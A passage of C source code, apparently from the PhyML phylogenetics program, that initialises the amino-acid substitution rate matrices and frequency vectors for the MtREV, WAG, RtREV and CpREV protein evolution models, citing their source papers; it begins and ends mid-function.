daa[16*20+ 4] = 42.00; daa[16*20+ 5] = 51.00; daa[16*20+ 6] = 32.00; daa[16*20+ 7] = 33.00;
daa[16*20+ 8] = 46.00; daa[16*20+ 9] = 245.00; daa[16*20+10] = 25.00; daa[16*20+11] = 103.00;
daa[16*20+12] = 226.00; daa[16*20+13] = 12.00; daa[16*20+14] = 118.00; daa[16*20+15] = 477.00;
daa[17*20+ 0] = 9.00; daa[17*20+ 1] = 126.00; daa[17*20+ 2] = 8.00; daa[17*20+ 3] = 4.00;
daa[17*20+ 4] = 115.00; daa[17*20+ 5] = 18.00; daa[17*20+ 6] = 10.00; daa[17*20+ 7] = 55.00;
daa[17*20+ 8] = 8.00; daa[17*20+ 9] = 9.00; daa[17*20+10] = 52.00; daa[17*20+11] = 10.00;
daa[17*20+12] = 24.00; daa[17*20+13] = 53.00; daa[17*20+14] = 6.00; daa[17*20+15] = 35.00;
daa[17*20+16] = 12.00; daa[18*20+ 0] = 11.00; daa[18*20+ 1] = 20.00; daa[18*20+ 2] = 70.00;
daa[18*20+ 3] = 46.00; daa[18*20+ 4] = 209.00; daa[18*20+ 5] = 24.00; daa[18*20+ 6] = 7.00;
daa[18*20+ 7] = 8.00; daa[18*20+ 8] = 573.00; daa[18*20+ 9] = 32.00; daa[18*20+10] = 24.00;
daa[18*20+11] = 8.00; daa[18*20+12] = 18.00; daa[18*20+13] = 536.00; daa[18*20+14] = 10.00;
daa[18*20+15] = 63.00; daa[18*20+16] = 21.00; daa[18*20+17] = 71.00; daa[19*20+ 0] = 298.00;
daa[19*20+ 1] = 17.00; daa[19*20+ 2] = 16.00; daa[19*20+ 3] = 31.00; daa[19*20+ 4] = 62.00;
daa[19*20+ 5] = 20.00; daa[19*20+ 6] = 45.00; daa[19*20+ 7] = 47.00; daa[19*20+ 8] = 11.00;
daa[19*20+ 9] = 961.00; daa[19*20+10] = 180.00; daa[19*20+11] = 14.00; daa[19*20+12] = 323.00;
daa[19*20+13] = 62.00; daa[19*20+14] = 23.00; daa[19*20+15] = 38.00; daa[19*20+16] = 112.00;
daa[19*20+17] = 25.00; daa[19*20+18] = 16.00;
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
pi[ 0] = 0.076748; pi[ 1] = 0.051691; pi[ 2] = 0.042645; pi[ 3] = 0.051544;
pi[ 4] = 0.019803; pi[ 5] = 0.040752; pi[ 6] = 0.061830; pi[ 7] = 0.073152;
pi[ 8] = 0.022944; pi[ 9] = 0.053761; pi[10] = 0.091904; pi[11] = 0.058676;
pi[12] = 0.023826; pi[13] = 0.040126; pi[14] = 0.050901; pi[15] = 0.068765;
pi[16] = 0.058565; pi[17] = 0.014261; pi[18] = 0.032102; pi[19] = 0.066005;
return 1;
}
/*********************************************************/
int Init_Qmat_MtREV(double *daa, double *pi)
{
int i,j,naa;
naa = 20;
daa[ 1*20+ 0] = 23.18; daa[ 2*20+ 0] = 26.95; daa[ 2*20+ 1] = 13.24; daa[ 3*20+ 0] = 17.67;
daa[ 3*20+ 1] = 1.90; daa[ 3*20+ 2] = 794.38; daa[ 4*20+ 0] = 59.93; daa[ 4*20+ 1] = 103.33;
daa[ 4*20+ 2] = 58.94; daa[ 4*20+ 3] = 1.90; daa[ 5*20+ 0] = 1.90; daa[ 5*20+ 1] = 220.99;
daa[ 5*20+ 2] = 173.56; daa[ 5*20+ 3] = 55.28; daa[ 5*20+ 4] = 75.24; daa[ 6*20+ 0] = 9.77;
daa[ 6*20+ 1] = 1.90; daa[ 6*20+ 2] = 63.05; daa[ 6*20+ 3] = 583.55; daa[ 6*20+ 4] = 1.90;
daa[ 6*20+ 5] = 313.56; daa[ 7*20+ 0] = 120.71; daa[ 7*20+ 1] = 23.03; daa[ 7*20+ 2] = 53.30;
daa[ 7*20+ 3] = 56.77; daa[ 7*20+ 4] = 30.71; daa[ 7*20+ 5] = 6.75; daa[ 7*20+ 6] = 28.28;
daa[ 8*20+ 0] = 13.90; daa[ 8*20+ 1] = 165.23; daa[ 8*20+ 2] = 496.13; daa[ 8*20+ 3] = 113.99;
daa[ 8*20+ 4] = 141.49; daa[ 8*20+ 5] = 582.40; daa[ 8*20+ 6] = 49.12; daa[ 8*20+ 7] = 1.90;
daa[ 9*20+ 0] = 96.49; daa[ 9*20+ 1] = 1.90; daa[ 9*20+ 2] = 27.10; daa[ 9*20+ 3] = 4.34;
daa[ 9*20+ 4] = 62.73; daa[ 9*20+ 5] = 8.34; daa[ 9*20+ 6] = 3.31; daa[ 9*20+ 7] = 5.98;
daa[ 9*20+ 8] = 12.26; daa[10*20+ 0] = 25.46; daa[10*20+ 1] = 15.58; daa[10*20+ 2] = 15.16;
daa[10*20+ 3] = 1.90; daa[10*20+ 4] = 25.65; daa[10*20+ 5] = 39.70; daa[10*20+ 6] = 1.90;
daa[10*20+ 7] = 2.41; daa[10*20+ 8] = 11.49; daa[10*20+ 9] = 329.09; daa[11*20+ 0] = 8.36;
daa[11*20+ 1] = 141.40; daa[11*20+ 2] = 608.70; daa[11*20+ 3] = 2.31; daa[11*20+ 4] = 1.90;
daa[11*20+ 5] = 465.58; daa[11*20+ 6] = 313.86; daa[11*20+ 7] = 22.73; daa[11*20+ 8] = 127.67;
daa[11*20+ 9] = 19.57; daa[11*20+10] = 14.88; daa[12*20+ 0] = 141.88; daa[12*20+ 1] = 1.90;
daa[12*20+ 2] = 65.41; daa[12*20+ 3] = 1.90; daa[12*20+ 4] = 6.18; daa[12*20+ 5] = 47.37;
daa[12*20+ 6] = 1.90; daa[12*20+ 7] = 1.90; daa[12*20+ 8] = 11.97; daa[12*20+ 9] = 517.98;
daa[12*20+10] = 537.53; daa[12*20+11] = 91.37; daa[13*20+ 0] = 6.37; daa[13*20+ 1] = 4.69;
daa[13*20+ 2] = 15.20; daa[13*20+ 3] = 4.98; daa[13*20+ 4] = 70.80; daa[13*20+ 5] = 19.11;
daa[13*20+ 6] = 2.67; daa[13*20+ 7] = 1.90; daa[13*20+ 8] = 48.16; daa[13*20+ 9] = 84.67;
daa[13*20+10] = 216.06; daa[13*20+11] = 6.44; daa[13*20+12] = 90.82; daa[14*20+ 0] = 54.31;
daa[14*20+ 1] = 23.64; daa[14*20+ 2] = 73.31; daa[14*20+ 3] = 13.43; daa[14*20+ 4] = 31.26;
daa[14*20+ 5] = 137.29; daa[14*20+ 6] = 12.83; daa[14*20+ 7] = 1.90; daa[14*20+ 8] = 60.97;
daa[14*20+ 9] = 20.63; daa[14*20+10] = 40.10; daa[14*20+11] = 50.10; daa[14*20+12] = 18.84;
daa[14*20+13] = 17.31; daa[15*20+ 0] = 387.86; daa[15*20+ 1] = 6.04; daa[15*20+ 2] = 494.39;
daa[15*20+ 3] = 69.02; daa[15*20+ 4] = 277.05; daa[15*20+ 5] = 54.11; daa[15*20+ 6] = 54.71;
daa[15*20+ 7] = 125.93; daa[15*20+ 8] = 77.46; daa[15*20+ 9] = 47.70; daa[15*20+10] = 73.61;
daa[15*20+11] = 105.79; daa[15*20+12] = 111.16; daa[15*20+13] = 64.29; daa[15*20+14] = 169.90;
daa[16*20+ 0] = 480.72; daa[16*20+ 1] = 2.08; daa[16*20+ 2] = 238.46; daa[16*20+ 3] = 28.01;
daa[16*20+ 4] = 179.97; daa[16*20+ 5] = 94.93; daa[16*20+ 6] = 14.82; daa[16*20+ 7] = 11.17;
daa[16*20+ 8] = 44.78; daa[16*20+ 9] = 368.43; daa[16*20+10] = 126.40; daa[16*20+11] = 136.33;
daa[16*20+12] = 528.17; daa[16*20+13] = 33.85; daa[16*20+14] = 128.22; daa[16*20+15] = 597.21;
daa[17*20+ 0] = 1.90; daa[17*20+ 1] = 21.95; daa[17*20+ 2] = 10.68; daa[17*20+ 3] = 19.86;
daa[17*20+ 4] = 33.60; daa[17*20+ 5] = 1.90; daa[17*20+ 6] = 1.90; daa[17*20+ 7] = 10.92;
daa[17*20+ 8] = 7.08; daa[17*20+ 9] = 1.90; daa[17*20+10] = 32.44; daa[17*20+11] = 24.00;
daa[17*20+12] = 21.71; daa[17*20+13] = 7.84; daa[17*20+14] = 4.21; daa[17*20+15] = 38.58;
daa[17*20+16] = 9.99; daa[18*20+ 0] = 6.48; daa[18*20+ 1] = 1.90; daa[18*20+ 2] = 191.36;
daa[18*20+ 3] = 21.21; daa[18*20+ 4] = 254.77; daa[18*20+ 5] = 38.82; daa[18*20+ 6] = 13.12;
daa[18*20+ 7] = 3.21; daa[18*20+ 8] = 670.14; daa[18*20+ 9] = 25.01; daa[18*20+10] = 44.15;
daa[18*20+11] = 51.17; daa[18*20+12] = 39.96; daa[18*20+13] = 465.58; daa[18*20+14] = 16.21;
daa[18*20+15] = 64.92; daa[18*20+16] = 38.73; daa[18*20+17] = 26.25; daa[19*20+ 0] = 195.06;
daa[19*20+ 1] = 7.64; daa[19*20+ 2] = 1.90; daa[19*20+ 3] = 1.90; daa[19*20+ 4] = 1.90;
daa[19*20+ 5] = 19.00; daa[19*20+ 6] = 21.14; daa[19*20+ 7] = 2.53; daa[19*20+ 8] = 1.90;
daa[19*20+ 9] = 1222.94; daa[19*20+10] = 91.67; daa[19*20+11] = 1.90; daa[19*20+12] = 387.54;
daa[19*20+13] = 6.35; daa[19*20+14] = 8.23; daa[19*20+15] = 1.90; daa[19*20+16] = 204.54;
daa[19*20+17] = 5.37; daa[19*20+18] = 1.90;
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
pi[ 0] = 0.072000; pi[ 1] = 0.019000; pi[ 2] = 0.039000; pi[ 3] = 0.019000;
pi[ 4] = 0.006000; pi[ 5] = 0.025000; pi[ 6] = 0.024000; pi[ 7] = 0.056000;
pi[ 8] = 0.028000; pi[ 9] = 0.088000; pi[10] = 0.169000; pi[11] = 0.023000;
pi[12] = 0.054000; pi[13] = 0.061000; pi[14] = 0.054000; pi[15] = 0.072000;
pi[16] = 0.086000; pi[17] = 0.029000; pi[18] = 0.033000; pi[19] = 0.043000;
return 1;
}
/*********************************************************/
int Init_Qmat_WAG(double *daa, double *pi)
{
int i,j,naa;
/* WAG's model data
* Simon Whelan and Nick Goldman
* 'A general empirical model of protein evolution derived from multiple
* protein families using a maximum-likelihood approach'
* MBE (2001) 18:691-699
*/
naa = 20;
daa[ 1*20+ 0] = 55.15710; daa[ 2*20+ 0] = 50.98480; daa[ 2*20+ 1] = 63.53460;
daa[ 3*20+ 0] = 73.89980; daa[ 3*20+ 1] = 14.73040; daa[ 3*20+ 2] = 542.94200;
daa[ 4*20+ 0] = 102.70400; daa[ 4*20+ 1] = 52.81910; daa[ 4*20+ 2] = 26.52560;
daa[ 4*20+ 3] = 3.02949; daa[ 5*20+ 0] = 90.85980; daa[ 5*20+ 1] = 303.55000;
daa[ 5*20+ 2] = 154.36400; daa[ 5*20+ 3] = 61.67830; daa[ 5*20+ 4] = 9.88179;
daa[ 6*20+ 0] = 158.28500; daa[ 6*20+ 1] = 43.91570; daa[ 6*20+ 2] = 94.71980;
daa[ 6*20+ 3] = 617.41600; daa[ 6*20+ 4] = 2.13520; daa[ 6*20+ 5] = 546.94700;
daa[ 7*20+ 0] = 141.67200; daa[ 7*20+ 1] = 58.46650; daa[ 7*20+ 2] = 112.55600;
daa[ 7*20+ 3] = 86.55840; daa[ 7*20+ 4] = 30.66740; daa[ 7*20+ 5] = 33.00520;
daa[ 7*20+ 6] = 56.77170; daa[ 8*20+ 0] = 31.69540; daa[ 8*20+ 1] = 213.71500;
daa[ 8*20+ 2] = 395.62900; daa[ 8*20+ 3] = 93.06760; daa[ 8*20+ 4] = 24.89720;
daa[ 8*20+ 5] = 429.41100; daa[ 8*20+ 6] = 57.00250; daa[ 8*20+ 7] = 24.94100;
daa[ 9*20+ 0] = 19.33350; daa[ 9*20+ 1] = 18.69790; daa[ 9*20+ 2] = 55.42360;
daa[ 9*20+ 3] = 3.94370; daa[ 9*20+ 4] = 17.01350; daa[ 9*20+ 5] = 11.39170;
daa[ 9*20+ 6] = 12.73950; daa[ 9*20+ 7] = 3.04501; daa[ 9*20+ 8] = 13.81900;
daa[10*20+ 0] = 39.79150; daa[10*20+ 1] = 49.76710; daa[10*20+ 2] = 13.15280;
daa[10*20+ 3] = 8.48047; daa[10*20+ 4] = 38.42870; daa[10*20+ 5] = 86.94890;
daa[10*20+ 6] = 15.42630; daa[10*20+ 7] = 6.13037; daa[10*20+ 8] = 49.94620;
daa[10*20+ 9] = 317.09700; daa[11*20+ 0] = 90.62650; daa[11*20+ 1] = 535.14200;
daa[11*20+ 2] = 301.20100; daa[11*20+ 3] = 47.98550; daa[11*20+ 4] = 7.40339;
daa[11*20+ 5] = 389.49000; daa[11*20+ 6] = 258.44300; daa[11*20+ 7] = 37.35580;
daa[11*20+ 8] = 89.04320; daa[11*20+ 9] = 32.38320; daa[11*20+10] = 25.75550;
daa[12*20+ 0] = 89.34960; daa[12*20+ 1] = 68.31620; daa[12*20+ 2] = 19.82210;
daa[12*20+ 3] = 10.37540; daa[12*20+ 4] = 39.04820; daa[12*20+ 5] = 154.52600;
daa[12*20+ 6] = 31.51240; daa[12*20+ 7] = 17.41000; daa[12*20+ 8] = 40.41410;
daa[12*20+ 9] = 425.74600; daa[12*20+10] = 485.40200; daa[12*20+11] = 93.42760;
daa[13*20+ 0] = 21.04940; daa[13*20+ 1] = 10.27110; daa[13*20+ 2] = 9.61621;
daa[13*20+ 3] = 4.67304; daa[13*20+ 4] = 39.80200; daa[13*20+ 5] = 9.99208;
daa[13*20+ 6] = 8.11339; daa[13*20+ 7] = 4.99310; daa[13*20+ 8] = 67.93710;
daa[13*20+ 9] = 105.94700; daa[13*20+10] = 211.51700; daa[13*20+11] = 8.88360;
daa[13*20+12] = 119.06300; daa[14*20+ 0] = 143.85500; daa[14*20+ 1] = 67.94890;
daa[14*20+ 2] = 19.50810; daa[14*20+ 3] = 42.39840; daa[14*20+ 4] = 10.94040;
daa[14*20+ 5] = 93.33720; daa[14*20+ 6] = 68.23550; daa[14*20+ 7] = 24.35700;
daa[14*20+ 8] = 69.61980; daa[14*20+ 9] = 9.99288; daa[14*20+10] = 41.58440;
daa[14*20+11] = 55.68960; daa[14*20+12] = 17.13290; daa[14*20+13] = 16.14440;
daa[15*20+ 0] = 337.07900; daa[15*20+ 1] = 122.41900; daa[15*20+ 2] = 397.42300;
daa[15*20+ 3] = 107.17600; daa[15*20+ 4] = 140.76600; daa[15*20+ 5] = 102.88700;
daa[15*20+ 6] = 70.49390; daa[15*20+ 7] = 134.18200; daa[15*20+ 8] = 74.01690;
daa[15*20+ 9] = 31.94400; daa[15*20+10] = 34.47390; daa[15*20+11] = 96.71300;
daa[15*20+12] = 49.39050; daa[15*20+13] = 54.59310; daa[15*20+14] = 161.32800;
daa[16*20+ 0] = 212.11100; daa[16*20+ 1] = 55.44130; daa[16*20+ 2] = 203.00600;
daa[16*20+ 3] = 37.48660; daa[16*20+ 4] = 51.29840; daa[16*20+ 5] = 85.79280;
daa[16*20+ 6] = 82.27650; daa[16*20+ 7] = 22.58330; daa[16*20+ 8] = 47.33070;
daa[16*20+ 9] = 145.81600; daa[16*20+10] = 32.66220; daa[16*20+11] = 138.69800;
daa[16*20+12] = 151.61200; daa[16*20+13] = 17.19030; daa[16*20+14] = 79.53840;
daa[16*20+15] = 437.80200; daa[17*20+ 0] = 11.31330; daa[17*20+ 1] = 116.39200;
daa[17*20+ 2] = 7.19167; daa[17*20+ 3] = 12.97670; daa[17*20+ 4] = 71.70700;
daa[17*20+ 5] = 21.57370; daa[17*20+ 6] = 15.65570; daa[17*20+ 7] = 33.69830;
daa[17*20+ 8] = 26.25690; daa[17*20+ 9] = 21.24830; daa[17*20+10] = 66.53090;
daa[17*20+11] = 13.75050; daa[17*20+12] = 51.57060; daa[17*20+13] = 152.96400;
daa[17*20+14] = 13.94050; daa[17*20+15] = 52.37420; daa[17*20+16] = 11.08640;
daa[18*20+ 0] = 24.07350; daa[18*20+ 1] = 38.15330; daa[18*20+ 2] = 108.60000;
daa[18*20+ 3] = 32.57110; daa[18*20+ 4] = 54.38330; daa[18*20+ 5] = 22.77100;
daa[18*20+ 6] = 19.63030; daa[18*20+ 7] = 10.36040; daa[18*20+ 8] = 387.34400;
daa[18*20+ 9] = 42.01700; daa[18*20+10] = 39.86180; daa[18*20+11] = 13.32640;
daa[18*20+12] = 42.84370; daa[18*20+13] = 645.42800; daa[18*20+14] = 21.60460;
daa[18*20+15] = 78.69930; daa[18*20+16] = 29.11480; daa[18*20+17] = 248.53900;
daa[19*20+ 0] = 200.60100; daa[19*20+ 1] = 25.18490; daa[19*20+ 2] = 19.62460;
daa[19*20+ 3] = 15.23350; daa[19*20+ 4] = 100.21400; daa[19*20+ 5] = 30.12810;
daa[19*20+ 6] = 58.87310; daa[19*20+ 7] = 18.72470; daa[19*20+ 8] = 11.83580;
daa[19*20+ 9] = 782.13000; daa[19*20+10] = 180.03400; daa[19*20+11] = 30.54340;
daa[19*20+12] = 205.84500; daa[19*20+13] = 64.98920; daa[19*20+14] = 31.48870;
daa[19*20+15] = 23.27390; daa[19*20+16] = 138.82300; daa[19*20+17] = 36.53690;
daa[19*20+18] = 31.47300;
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
pi[0] = 0.0866279; pi[1] = 0.043972; pi[2] = 0.0390894; pi[3] = 0.0570451;
pi[4] = 0.0193078; pi[5] = 0.0367281; pi[6] = 0.0580589; pi[7] = 0.0832518;
pi[8] = 0.0244313; pi[9] = 0.048466; pi[10] = 0.086209; pi[11] = 0.0620286;
pi[12] = 0.0195027; pi[13] = 0.0384319; pi[14] = 0.0457631; pi[15] = 0.0695179;
pi[16] = 0.0610127; pi[17] = 0.0143859; pi[18] = 0.0352742; pi[19] = 0.0708956;
return 1;
}
/*********************************************************/
int Init_Qmat_RtREV(double *daa, double *pi)
{
/*
This model has been 'translated' from John Huelsenbeck and Fredrik Ronquist
MrBayes program into PHYML format by Federico Abascal. Many thanks to them.
*/
/*
Dimmic M.W., J.S. Rest, D.P. Mindell, and D. Goldstein. 2002. RArtREV:
An amino acid substitution matrix for inference of retrovirus and
reverse transcriptase phylogeny. Journal of Molecular Evolution
55: 65-73.
*/
int i,j,naa;
naa = 20;
daa[1*20+0]= 34; daa[2*20+0]= 51; daa[2*20+1]= 35; daa[3*20+0]= 10;
daa[3*20+1]= 30; daa[3*20+2]= 384; daa[4*20+0]= 439; daa[4*20+1]= 92;
daa[4*20+2]= 128; daa[4*20+3]= 1; daa[5*20+0]= 32; daa[5*20+1]= 221;
daa[5*20+2]= 236; daa[5*20+3]= 78; daa[5*20+4]= 70; daa[6*20+0]= 81;
daa[6*20+1]= 10; daa[6*20+2]= 79; daa[6*20+3]= 542; daa[6*20+4]= 1;
daa[6*20+5]= 372; daa[7*20+0]= 135; daa[7*20+1]= 41; daa[7*20+2]= 94;
daa[7*20+3]= 61; daa[7*20+4]= 48; daa[7*20+5]= 18; daa[7*20+6]= 70;
daa[8*20+0]= 30; daa[8*20+1]= 90; daa[8*20+2]= 320; daa[8*20+3]= 91;
daa[8*20+4]= 124; daa[8*20+5]= 387; daa[8*20+6]= 34; daa[8*20+7]= 68;
daa[9*20+0]= 1; daa[9*20+1]= 24; daa[9*20+2]= 35; daa[9*20+3]= 1;
daa[9*20+4]= 104; daa[9*20+5]= 33; daa[9*20+6]= 1; daa[9*20+7]= 1;
daa[9*20+8]= 34; daa[10*20+0]= 45; daa[10*20+1]= 18; daa[10*20+2]= 15;
daa[10*20+3]= 5; daa[10*20+4]= 110; daa[10*20+5]= 54; daa[10*20+6]= 21;
daa[10*20+7]= 3; daa[10*20+8]= 51; daa[10*20+9]= 385; daa[11*20+0]= 38;
daa[11*20+1]= 593; daa[11*20+2]= 123; daa[11*20+3]= 20; daa[11*20+4]= 16;
daa[11*20+5]= 309; daa[11*20+6]= 141; daa[11*20+7]= 30; daa[11*20+8]= 76;
daa[11*20+9]= 34; daa[11*20+10]= 23; daa[12*20+0]= 235; daa[12*20+1]= 57;
daa[12*20+2]= 1; daa[12*20+3]= 1; daa[12*20+4]= 156; daa[12*20+5]= 158;
daa[12*20+6]= 1; daa[12*20+7]= 37; daa[12*20+8]= 116; daa[12*20+9]= 375;
daa[12*20+10]= 581; daa[12*20+11]= 134; daa[13*20+0]= 1; daa[13*20+1]= 7;
daa[13*20+2]= 49; daa[13*20+3]= 1; daa[13*20+4]= 70; daa[13*20+5]= 1;
daa[13*20+6]= 1; daa[13*20+7]= 7; daa[13*20+8]= 141; daa[13*20+9]= 64;
daa[13*20+10]= 179; daa[13*20+11]= 14; daa[13*20+12]= 247; daa[14*20+0]= 97;
daa[14*20+1]= 24; daa[14*20+2]= 33; daa[14*20+3]= 55; daa[14*20+4]= 1;
daa[14*20+5]= 68; daa[14*20+6]= 52; daa[14*20+7]= 17; daa[14*20+8]= 44;
daa[14*20+9]= 10; daa[14*20+10]= 22; daa[14*20+11]= 43; daa[14*20+12]= 1;
daa[14*20+13]= 11; daa[15*20+0]= 460; daa[15*20+1]= 102; daa[15*20+2]= 294;
daa[15*20+3]= 136; daa[15*20+4]= 75; daa[15*20+5]= 225; daa[15*20+6]= 95;
daa[15*20+7]= 152; daa[15*20+8]= 183; daa[15*20+9]= 4; daa[15*20+10]= 24;
daa[15*20+11]= 77; daa[15*20+12]= 1; daa[15*20+13]= 20; daa[15*20+14]= 134;
daa[16*20+0]= 258; daa[16*20+1]= 64; daa[16*20+2]= 148; daa[16*20+3]= 55;
daa[16*20+4]= 117; daa[16*20+5]= 146; daa[16*20+6]= 82; daa[16*20+7]= 7;
daa[16*20+8]= 49; daa[16*20+9]= 72; daa[16*20+10]= 25; daa[16*20+11]= 110;
daa[16*20+12]= 131; daa[16*20+13]= 69; daa[16*20+14]= 62; daa[16*20+15]= 671;
daa[17*20+0]= 5; daa[17*20+1]= 13; daa[17*20+2]= 16; daa[17*20+3]= 1;
daa[17*20+4]= 55; daa[17*20+5]= 10; daa[17*20+6]= 17; daa[17*20+7]= 23;
daa[17*20+8]= 48; daa[17*20+9]= 39; daa[17*20+10]= 47; daa[17*20+11]= 6;
daa[17*20+12]= 111; daa[17*20+13]= 182; daa[17*20+14]= 9; daa[17*20+15]= 14;
daa[17*20+16]= 1; daa[18*20+0]= 55; daa[18*20+1]= 47; daa[18*20+2]= 28;
daa[18*20+3]= 1; daa[18*20+4]= 131; daa[18*20+5]= 45; daa[18*20+6]= 1;
daa[18*20+7]= 21; daa[18*20+8]= 307; daa[18*20+9]= 26; daa[18*20+10]= 64;
daa[18*20+11]= 1; daa[18*20+12]= 74; daa[18*20+13]= 1017; daa[18*20+14]= 14;
daa[18*20+15]= 31; daa[18*20+16]= 34; daa[18*20+17]= 176; daa[19*20+0]= 197;
daa[19*20+1]= 29; daa[19*20+2]= 21; daa[19*20+3]= 6; daa[19*20+4]= 295;
daa[19*20+5]= 36; daa[19*20+6]= 35; daa[19*20+7]= 3; daa[19*20+8]= 1;
daa[19*20+9]= 1048; daa[19*20+10]= 112; daa[19*20+11]= 19; daa[19*20+12]= 236;
daa[19*20+13]= 92; daa[19*20+14]= 25; daa[19*20+15]= 39; daa[19*20+16]= 196;
daa[19*20+17]= 26; daa[19*20+18]= 59;
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
pi[0]= 0.0646; pi[1]= 0.0453; pi[2]= 0.0376; pi[3]= 0.0422;
pi[4]= 0.0114; pi[5]= 0.0606; pi[6]= 0.0607; pi[7]= 0.0639;
pi[8]= 0.0273; pi[9]= 0.0679; pi[10]= 0.1018; pi[11]= 0.0751;
pi[12]= 0.015; pi[13]= 0.0287; pi[14]= 0.0681; pi[15]= 0.0488;
pi[16]= 0.0622; pi[17]= 0.0251; pi[18]= 0.0318; pi[19]= 0.0619;
return 1;
}
/*********************************************************/
int Init_Qmat_CpREV(double *daa, double *pi)
{
/*
This model has been 'translated' from John Huelsenbeck and Fredrik Ronquist
MrBayes program into PHYML format by Federico Abascal. Many thanks to them.
*/
/*
Adachi, J., P. Waddell, W. Martin, and M. Hasegawa. 2000. Plastid
genome phylogeny and a model of amino acid substitution for proteins
encoded by chloroplast DNA. Journal of Molecular Evolution
50:348-358.
*/
int i,j,naa;
naa = 20;
daa[1*20+0]= 105; daa[2*20+0]= 227; daa[2*20+1]= 357; daa[3*20+0]= 175;
daa[3*20+1]= 43; daa[3*20+2]= 4435; daa[4*20+0]= 669; daa[4*20+1]= 823;
daa[4*20+2]= 538; daa[4*20+3]= 10; daa[5*20+0]= 157; daa[5*20+1]= 1745;
daa[5*20+2]= 768; daa[5*20+3]= 400; daa[5*20+4]= 10; daa[6*20+0]= 499;
daa[6*20+1]= 152; daa[6*20+2]= 1055; daa[6*20+3]= 3691; daa[6*20+4]= 10;
daa[6*20+5]= 3122; daa[7*20+0]= 665; daa[7*20+1]= 243; daa[7*20+2]= 653;
daa[7*20+3]= 431; daa[7*20+4]= 303; daa[7*20+5]= 133; daa[7*20+6]= 379;
daa[8*20+0]= 66; daa[8*20+1]= 715; daa[8*20+2]= 1405; daa[8*20+3]= 331;
daa[8*20+4]= 441; daa[8*20+5]= 1269; daa[8*20+6]= 162; daa[8*20+7]= 19;
daa[9*20+0]= 145; daa[9*20+1]= 136; daa[9*20+2]= 168; daa[9*20+3]= 10;
daa[9*20+4]= 280; daa[9*20+5]= 92; daa[9*20+6]= 148; daa[9*20+7]= 40;
daa[9*20+8]= 29; daa[10*20+0]= 197; daa[10*20+1]= 203; daa[10*20+2]= 113;
daa[10*20+3]= 10; daa[10*20+4]= 396; daa[10*20+5]= 286; daa[10*20+6]= 82;
daa[10*20+7]= 20; daa[10*20+8]= 66; daa[10*20+9]= 1745; daa[11*20+0]= 236;
daa[11*20+1]= 4482; daa[11*20+2]= 2430; daa[11*20+3]= 412; daa[11*20+4]= 48;
daa[11*20+5]= 3313; daa[11*20+6]= 2629; daa[11*20+7]= 263; daa[11*20+8]= 305;
daa[11*20+9]= 345; daa[11*20+10]= 218; daa[12*20+0]= 185; daa[12*20+1]= 125;
daa[12*20+2]= 61; daa[12*20+3]= 47; daa[12*20+4]= 159; daa[12*20+5]= 202;
daa[12*20+6]= 113; daa[12*20+7]= 21; daa[12*20+8]= 10; daa[12*20+9]= 1772;
daa[12*20+10]= 1351; daa[12*20+11]= 193; daa[13*20+0]= 68; daa[13*20+1]= 53;
daa[13*20+2]= 97; daa[13*20+3]= 22; daa[13*20+4]= 726; daa[13*20+5]= 10;
daa[13*20+6]= 145; daa[13*20+7]= 25; daa[13*20+8]= 127; daa[13*20+9]= 454;
daa[13*20+10]= 1268; daa[13*20+11]= 72; daa[13*20+12]= 327; daa[14*20+0]= 490;
daa[14*20+1]= 87; daa[14*20+2]= 173; daa[14*20+3]= 170; daa[14*20+4]= 285;
daa[14*20+5]= 323; daa[14*20+6]= 185; daa[14*20+7]= 28; daa[14*20+8]= 152;
daa[14*20+9]= 117; daa[14*20+10]= 219; daa[14*20+11]= 302; daa[14*20+12]= 100;
daa[14*20+13]= 43; daa[15*20+0]= 2440; daa[15*20+1]= 385; daa[15*20+2]= 2085;
daa[15*20+3]= 590; daa[15*20+4]= 2331; daa[15*20+5]= 396; daa[15*20+6]= 568;
daa[15*20+7]= 691; daa[15*20+8]= 303; daa[15*20+9]= 216; daa[15*20+10]= 516;
daa[15*20+11]= 868; daa[15*20+12]= 93; daa[15*20+13]= 487; daa[15*20+14]= 1202;
daa[16*20+0]= 1340; daa[16*20+1]= 314; daa[16*20+2]= 1393; daa[16*20+3]= 266;
daa[16*20+4]= 576; daa[16*20+5]= 241; daa[16*20+6]= 369; daa[16*20+7]= 92;
daa[16*20+8]= 32; daa[16*20+9]= 1040; daa[16*20+10]= 156; daa[16*20+11]= 918;
daa[16*20+12]= 645; daa[16*20+13]= 148; daa[16*20+14]= 260; daa[16*20+15]= 2151;
daa[17*20+0]= 14; daa[17*20+1]= 230; daa[17*20+2]= 40; daa[17*20+3]= 18;
daa[17*20+4]= 435; daa[17*20+5]= 53; daa[17*20+6]= 63; daa[17*20+7]= 82;
daa[17*20+8]= 69; daa[17*20+9]= 42; daa[17*20+10]= 159; daa[17*20+11]= 10;
daa[17*20+12]= 86; daa[17*20+13]= 468; daa[17*20+14]= 49; daa[17*20+15]= 73;
daa[17*20+16]= 29; daa[18*20+0]= 56; daa[18*20+1]= 323; daa[18*20+2]= 754;
daa[18*20+3]= 281; daa[18*20+4]= 1466; daa[18*20+5]= 391; daa[18*20+6]= 142;
daa[18*20+7]= 10; daa[18*20+8]= 1971; daa[18*20+9]= 89; daa[18*20+10]= 189;
daa[18*20+11]= 247; daa[18*20+12]= 215; daa[18*20+13]= 2370; daa[18*20+14]= 97;
daa[18*20+15]= 522; daa[18*20+16]= 71; daa[18*20+17]= 346; daa[19*20+0]= 968;
daa[19*20+1]= 92; daa[19*20+2]= 83; daa[19*20+3]= 75; daa[19*20+4]= 592;
daa[19*20+5]= 54; daa[19*20+6]= 200; daa[19*20+7]= 91; daa[19*20+8]= 25;
daa[19*20+9]= 4797; daa[19*20+10]= 865; daa[19*20+11]= 249; daa[19*20+12]= 475;
daa[19*20+13]= 317; daa[19*20+14]= 122; daa[19*20+15]= 167; daa[19*20+16]= 760;
daa[19*20+17]= 10; daa[19*20+18]= 119;
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
pi[0]= 0.076; pi[1]= 0.062; pi[2]= 0.041; pi[3]= 0.037;
pi[4]= 0.009; pi[5]= 0.038; pi[6]= 0.049; pi[7]= 0.084;
pi[8]= 0.025; pi[9]= 0.081; pi[10]= 0.101; pi[11]= 0.05;
